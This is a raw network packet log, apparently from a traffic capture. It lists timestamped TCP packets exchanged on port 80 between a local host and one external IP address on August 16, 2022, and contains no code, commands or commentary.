                                        Aug 16, 2022 10:48:52.825906038 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.825922966 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.825939894 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.825948954 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.825959921 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.825968027 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.825977087 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.825987101 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.825995922 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.826005936 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.826013088 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.826021910 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.826040030 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.826057911 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:52.826067924 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.826102972 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.827831984 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:52.829260111 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.030198097 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.030224085 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.030241966 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.030258894 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.030275106 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.030283928 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.030289888 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.030319929 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.030353069 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.034631014 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.042288065 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.042342901 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.042371035 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.042422056 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.042438984 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.042454004 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.042474985 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.042481899 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.042505026 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.042534113 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.042551041 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.042557955 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.042577028 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.042588949 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.042593002 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.042617083 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.042625904 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.042634010 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.042650938 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.042691946 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.042716026 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.042753935 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.042758942 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.042784929 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.042814016 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.042818069 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.042823076 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.042851925 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.042866945 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.042881966 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.042891979 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.042897940 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.042931080 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.042939901 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.042968035 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.042973995 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.042979956 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.043014050 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.043018103 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.043030024 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.043056011 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.043067932 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.045211077 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.046933889 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.265511036 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.265552998 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.265583038 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.265588045 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.265614033 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.265640020 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.265674114 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.265707970 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.265707970 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.265712976 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.265714884 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.265717030 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.265741110 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.265742064 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.265773058 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.265782118 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.265808105 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.265814066 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.265841961 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.265847921 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.265873909 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.265882015 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.265908003 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.265913963 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.265940905 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.265949011 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.265973091 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.265980959 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.266006947 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.266011953 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.266046047 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.266051054 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.266086102 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.267405987 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.269911051 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.269937992 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.269963980 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.269985914 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.270016909 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.270023108 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.270042896 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.270097017 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.270170927 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.270195961 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.270225048 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.270237923 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.270241022 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.270267963 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.270287991 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.270322084 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.270363092 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.270390987 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.270432949 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.270433903 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.270442963 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.270486116 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.270493984 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.270541906 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.270602942 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.270622969 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.270652056 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.270672083 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.276933908 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:53.490875006 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:53.491045952 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:58.270087957 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:58.270176888 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:58.493467093 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:58.497200966 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:03.425447941 CEST4919980192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:03.425971985 CEST4920080192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:03.426928997 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:03.434391022 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:03.641444921 CEST8049199187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:03.651345015 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:03.651492119 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:03.652647018 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:03.654570103 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:03.654680967 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:03.655607939 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:03.661770105 CEST8049200187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:03.871121883 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:03.871315002 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:03.871342897 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:03.871380091 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:03.871380091 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:03.871402979 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:03.871403933 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:03.871426105 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:03.871445894 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:03.871480942 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:03.871503115 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:03.871521950 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:03.871522903 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:03.871541023 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:03.871545076 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:03.871560097 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:03.871568918 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:03.871589899 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:03.871592999 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:03.871611118 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:03.871630907 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:03.874403954 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:03.883177042 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:03.883477926 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:03.883511066 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:03.883531094 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:03.883539915 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:03.883554935 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:03.883568048 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:03.883570910 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:03.883599997 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:03.883599997 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:03.883630991 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:03.883632898 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:03.883660078 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:03.883662939 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:03.883692026 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:03.883692026 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:03.883723021 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:03.883727074 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:03.883754969 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:03.883755922 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:03.883786917 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:03.885198116 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.087519884 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.087589979 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.087634087 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.087677956 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.087683916 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.087706089 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.087734938 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.087791920 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.087796926 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.087842941 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.087908983 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.090487003 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.111326933 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.111402988 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.111442089 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.111476898 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.111512899 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.111546993 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.111576080 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.111582994 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.111619949 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.111630917 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.111637115 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.111655951 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.111656904 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.111694098 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.111701012 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.111730099 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.111742020 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.111763954 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.111778021 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.111799955 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.111813068 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.111836910 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.111849070 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.111872911 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.111888885 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.111911058 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.111929893 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.111944914 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.111979961 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.112019062 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.112020016 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.112044096 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.112082005 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.112112999 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.120057106 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.303447008 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.303586960 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.305439949 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.339721918 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.339847088 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.339951992 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.339998960 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.340055943 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.340117931 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.340128899 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.340133905 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.340174913 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.340230942 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.340295076 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.340308905 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.340317965 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.340358019 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.340368986 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.340415001 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.340428114 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.340472937 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.340473890 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.340533018 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.340538979 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.340590954 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.340612888 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.340651989 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.340682983 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.340715885 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.340728998 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.340774059 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.340775967 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.340831995 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.340836048 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.340892076 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.340892076 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.340953112 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.340955019 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.341012001 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.341012001 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.341069937 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.341069937 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.341128111 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.341128111 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.341185093 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.341186047 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.341242075 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.341243982 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.341303110 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.341325045 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.341362000 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.341398001 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.341423035 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.341439962 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.341483116 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.341490984 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.341548920 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.341550112 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.341604948 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.341608047 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.341662884 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.341665030 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.341748953 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.341780901 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.341820955 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.341830969 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.341866970 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.341871977 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.341887951 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.341936111 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.341938019 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.341984034 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.348123074 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.348213911 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.348279953 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.348346949 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.348366976 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.348431110 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.348464966 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.373517036 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.519659996 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.519774914 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.569571018 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.569602966 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.569619894 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.569636106 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.569653988 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.569669962 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.569681883 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.569688082 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.569705009 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.569709063 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.569766998 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.569770098 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.569816113 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.569833040 CEST8049203187.45.240.69192.168.2.22
